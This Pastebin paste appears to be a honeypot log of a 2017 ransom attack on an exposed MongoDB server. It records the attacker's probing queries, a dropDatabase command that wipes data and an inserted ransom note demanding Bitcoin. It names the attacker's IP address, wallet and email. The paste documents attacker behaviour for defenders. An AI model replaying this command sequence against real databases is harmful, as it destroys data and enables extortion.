API tools faq
paste
Advertisement
Plazmaz

MongoDB Attacker kraken0@india.com

Plazmaz
Jan 20th, 2017
851
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.03 KB | None | 0 0
raw download clone embed print report
  1. [2017-01-20T12:13:59.113Z] ::ffff:185.38.14.171:53133 connected.
  2. [2017-01-20T12:14:00.000Z] ::ffff:185.38.14.171:53133 -> Server:
  3. [2017-01-20T12:14:00.000Z] admin.$cmd
  4. [2017-01-20T12:14:00.000Z] Flags: [object Object]
  5. Query: [{"isMaster":1,"client":{"driver":{"name":"mongo-csharp-driver","version":"1.0.0.0"},"os":{"type":"Windows","name":"Microsoft Windows 10.0.14393","architecture":"x86_64","version":"10.0.14393"},"platform":".NET Framework 4.0.0.0"}}]
  6. Return Fields: [{"isMaster":1,"client":{"driver":{"name":"mongo-csharp-driver","version":"1.0.0.0"},"os":{"type":"Windows","name":"Microsoft Windows 10.0.14393","architecture":"x86_64","version":"10.0.14393"},"platform":".NET Framework 4.0.0.0"}}]
  7.  
  8. [2017-01-20T12:14:00.001Z] Server -> ::ffff:185.38.14.171:53133:
  9. [2017-01-20T12:14:00.001Z] Flags: 8
  10. Documents: [{"ismaster":true,"maxBsonObjectSize":16777216,"maxMessageSizeBytes":48000000,"maxWriteBatchSize":1000,"localTime":"2017-01-20T12:14:00.001Z","maxWireVersion":2,"minWireVersion":0,"ok":1}]
  11.  
  12. [2017-01-20T12:14:00.872Z] ::ffff:185.38.14.171:53133 -> Server:
  13. [2017-01-20T12:14:00.872Z] admin.$cmd
  14. [2017-01-20T12:14:00.873Z] Flags: [object Object]
  15. Query: [{"buildInfo":1}]
  16. Return Fields: [{"buildInfo":1}]
  17.  
  18. [2017-01-20T12:14:00.873Z] Server -> ::ffff:185.38.14.171:53133:
  19. [2017-01-20T12:14:00.873Z] Flags: 8
  20. Documents: [{"version":"2.6.12","gitVersion":"d73c92b1c85703828b55c2916a5dd4ad46535f6a","OpenSSLVersion":"","sysInfo":"Linux build5.ny.cbi.10gen.cc 2.6.32-431.3.1.el6.x86_64 #1 SMP Fri Jan 3 21:39:27 UTC 2014 x86_64 BOOST_LIB_VERSION=1_49","loaderFlags":"-fPIC -pthread -Wl,-z,now -rdynamic","compilerFlags":"-Wnon-virtual-dtor -Woverloaded-virtual -fPIC -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -pipe -Werror -O3 -Wno-unused-function -Wno-deprecated-declarations -fno-builtin-memcmp","allocator":"tcmalloc","versionArray":[2,6,12,0],"javascriptEngine":"V8","bits":64,"debug":false,"maxBsonObjectSize":16777216,"ok":1}]
  21.  
  22. [2017-01-20T12:14:01.684Z] ::ffff:185.38.14.171:53133 -> Server:
  23. [2017-01-20T12:14:01.684Z] admin.$cmd
  24. [2017-01-20T12:14:01.684Z] Flags: [object Object]
  25. Query: [{"getLastError":1}]
  26. Return Fields: [{"getLastError":1}]
  27.  
  28. [2017-01-20T12:14:01.685Z] Server -> ::ffff:185.38.14.171:53133:
  29. [2017-01-20T12:14:01.685Z] Flags: 8
  30. Documents: [{"connectionId":195,"n":0,"syncMillis":0,"writtenTo":null,"err":null,"ok":1}]
  31.  
  32. [2017-01-20T12:14:02.665Z] ::ffff:185.38.14.171:53133 -> Server:
  33. [2017-01-20T12:14:02.665Z] admin.$cmd
  34. [2017-01-20T12:14:02.665Z] Query: [{"listDatabases":1}]
  35. Return Fields: [{"listDatabases":1}]
  36.  
  37. [2017-01-20T12:14:02.666Z] Server -> ::ffff:185.38.14.171:53133:
  38. [2017-01-20T12:14:02.666Z] Flags: 8
  39. Documents: [{"databases":[{"name":"PLEASE_READ","sizeOnDisk":83886080,"empty":false}],"totalSize":83886080,"ok":1}]
  40.  
  41. [2017-01-20T12:14:03.558Z] ::ffff:185.38.14.171:53133 -> Server:
  42. [2017-01-20T12:14:03.558Z] PLEASE_READ.$cmd
  43. [2017-01-20T12:14:03.559Z] Query: [{"dropDatabase":1}]
  44. Return Fields: [{"dropDatabase":1}]
  45.  
  46. [2017-01-20T12:14:03.566Z] Server -> ::ffff:185.38.14.171:53133:
  47. [2017-01-20T12:14:03.566Z] Flags: 8
  48. Documents: [{"dropped":"PLEASE_READ","ok":1}]
  49.  
  50. [2017-01-20T12:14:04.390Z] ::ffff:185.38.14.171:53133 -> Server:
  51. [2017-01-20T12:14:04.390Z] PLEASE_READ.$cmd
  52. [2017-01-20T12:14:04.390Z] Query: [{"insert":"PLEASE_READ","ordered":true,"documents":[{"_id":"5881ff0aaff9bd0a6c5b14af","Info":"Your DB is Backed up at our servers, to restore send 0.2 BTC to the Bitcoin Address then send an email with your server ip","Bitcoin Address":"1J5ADzFv1gx3fsUPUY1AWktuJ6DF9P6hiF","Email":"kraken0@india.com"}]}]
  53. Return Fields: [{"insert":"PLEASE_READ","ordered":true,"documents":[{"_id":"5881ff0aaff9bd0a6c5b14af","Info":"Your DB is Backed up at our servers, to restore send 0.2 BTC to the Bitcoin Address then send an email with your server ip","Bitcoin Address":"1J5ADzFv1gx3fsUPUY1AWktuJ6DF9P6hiF","Email":"kraken0@india.com"}]}]
  54.  
  55. [2017-01-20T12:14:04.454Z] Server -> ::ffff:185.38.14.171:53133:
  56. [2017-01-20T12:14:04.454Z] Flags: 8
  57. Documents: [{"ok":1,"n":1}]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!